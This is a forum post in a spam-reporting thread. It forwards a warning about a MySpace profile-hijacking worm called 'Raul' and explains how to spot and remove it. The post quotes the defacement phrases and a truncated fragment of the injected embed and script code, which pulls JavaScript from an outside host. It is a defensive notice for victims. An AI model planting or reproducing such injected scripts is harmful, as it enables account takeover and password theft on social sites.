MySpacers - Raul

PLEASE REPORT ANY FORUM SPAM ON HERE.

Also if you have any other personal spam or other spam matters then feel free to post them here.
the.fee.fairy
Site Admin
Site Admin

MySpacers - Raul

Just got this in my bulletins.
Might be worth checking your profiles m'dears.
ooh..and add me while you're there...the.fee.fairyATgmail

It seems there is another myspace hijack going on. Please take a moment to have a look at your page. Whomever is doing the hacking is changing peoples profiles with things like

"Raul owns this bitch! ***Inland_Empire***"

and

"but most of all Raul is my hero, not sammy!" (in my heros)

and

"and of course sexy Raul!" (in the who I'd like to meet)

If any of these (or similar) appear in your profile then your password has been compromised. Before you change your password, first of all have a look in your profile code and remove the mallicious script that will have probably been inserted somewhere. It will be a few lines that read something like

embed enableJSURL="false" enableHREF="false" saveEmbedTags="true" allowScriptAccess="never" allownetworking="internal" allowScriptAccess="never" allownetworking="internal" >.. language="javascript" src="http://angeliceyz00.cbstaff.com/worm/re ... ">function nothingf(){document.write("jajaja.mov.r{}");}..>

Delete this first! (This is the function that the script kiddie is using to capture your passwords!) Once you've deleted this code (or something similar - look for the "request.js" bit) change your password!

PLEASE NOTE! If you visit someone who has this code in their page, there is a chance that you will be re-hijaced! To completely protect yourself set your security settings to 'prompt' for JAVA scripting (Tools-> Internet Options -> Security -> Custom Level -> Scripting of Java Applets)

Please pass this on to all your friends!